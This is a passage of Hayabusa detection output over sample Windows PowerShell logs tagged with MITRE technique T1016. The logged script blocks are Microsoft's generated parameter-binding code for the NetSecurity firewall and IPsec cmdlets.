IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefaultInboundAction')) { [object]$__cmdletization_value = ${DefaultInboundAction} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefaultInboundAction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefaultInboundAction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefaultOutboundAction')) { [object]$__cmdletization_value = ${DefaultOutboundAction} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefaultOutboundAction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = 
$__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefaultOutboundAction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowInboundRules')) { [object]$__cmdletization_value = ${AllowInboundRules} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowInboundRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowInboundRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowLocalFirewallRules')) { [object]$__cmdletization_value = ${AllowLocalFirewallRules} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowLocalFirewallRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; 
Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowLocalFirewallRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowLocalIPsecRules')) { [object]$__cmdletization_value = ${AllowLocalIPsecRules} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowLocalIPsecRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowLocalIPsecRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdleti",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.067 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"zation_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null 
[object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowUserApps')) { [object]$__cmdletization_value = ${AllowUserApps} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowUserApps'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowUserApps'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowUserPorts')) { [object]$__cmdletization_value = ${AllowUserPorts} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowUserPorts'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowUserPorts'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null 
[object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowUnicastResponseToMulticast')) { [object]$__cmdletization_value = ${AllowUnicastResponseToMulticast} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowUnicastResponseToMulticast'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowUnicastResponseToMulticast'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NotifyOnListen')) { [object]$__cmdletization_value = ${NotifyOnListen} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NotifyOnListen'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NotifyOnListen'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) 
[object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnableStealthModeForIPsec')) { [object]$__cmdletization_value = ${EnableStealthModeForIPsec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnableStealthModeForIPsec'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnableStealthModeForIPsec'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LogFileName')) { [object]$__cmdletization_value = ${LogFileName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LogFileName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LogFileName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 
($PSBoundParameters.ContainsKey('LogMaxSizeKilobytes')) { [object]$__cmdletization_value = ${LogMaxSizeKilobytes} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LogMaxSizeKilobytes'; ParameterType = 'System.UInt64'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LogMaxSizeKilobytes'; ParameterType = 'System.UInt64'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LogAllowed')) { [object]$__cmdletization_value = ${LogAllowed} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LogAllowed'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LogAllowed'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LogBlocked')) { [object]$__cmdletization_value = ${LogBlocked} $__cmdletization_methodParameter = 
Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LogBlocked'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LogBlocked'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LogIgnored')) { [object]$__cmdletization_value = ${LogIgnored} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LogIgnored'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LogIgnored'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisabledInterfaceAliases')) { [object]$__cmdletization_value = ${DisabledInterfaceAliases} $__cmdletization_methodParameter = 
Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DisabledInterfaceAliases'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DisabledInterfaceAliases'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallProfile.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.067 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock 
Log," 1.0.0.0 NetIPsecPolicyChange ",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.067 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 if ($(Microsoft.PowerShell.Core\Get-Command Set-StrictMode -Module Microsoft.PowerShell.Core)) { Microsoft.PowerShell.Core\Set-StrictMode -Off } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetSecDeltaCollection' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = 'Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter' $script:PrivateData = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.Dictionary[string,string]' Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.067 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock 
Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.067 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log," 1.0.0.0 NetIPsecDospSetting ",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.082 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Command): ""Get-Command"" ParameterBinding(Get-Command): name=""Module""; value=""Microsoft.PowerShell.Core"" ParameterBinding(Get-Command): name=""Name""; value=""Set-StrictMode""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.082 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 if 
($(Microsoft.PowerShell.Core\Get-Command Set-StrictMode -Module Microsoft.PowerShell.Core)) { Microsoft.PowerShell.Core\Set-StrictMode -Off } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIPsecDoSPSetting' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = 'Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter' $script:PrivateData = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.Dictionary[string,string]' Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecDospSetting { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${StateIdleTimeoutSeconds}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${PerIPRateLimitQueueIdleTimeoutSeconds}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecUnauthDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecUnauthRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint16] 
${IpV6IPsecAuthDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecAuthRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint16] ${IcmpV6Dscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IcmpV6RateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6FilterExemptDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6FilterExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint16] ${DefBlockExemptDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${DefBlockExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${MaxStateEntries}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${MaxPerIPRateLimitQueues}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules] ${EnabledKeyingModules}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags] ${FilteringFlags}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [System.Management.Automation.WildcardPattern[]] ${PublicInterfaceAliases}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [System.Management.Automation.WildcardPattern[]] ${PrivateInterfaceAliases}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PublicV6Address}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PrivateV6Address}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { 
$__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 
($PSBoundParameters.ContainsKey('StateIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${StateIdleTimeoutSeconds} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerIPRateLimitQueueIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${PerIPRateLimitQueueIdleTimeoutSeconds} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthDscp} 
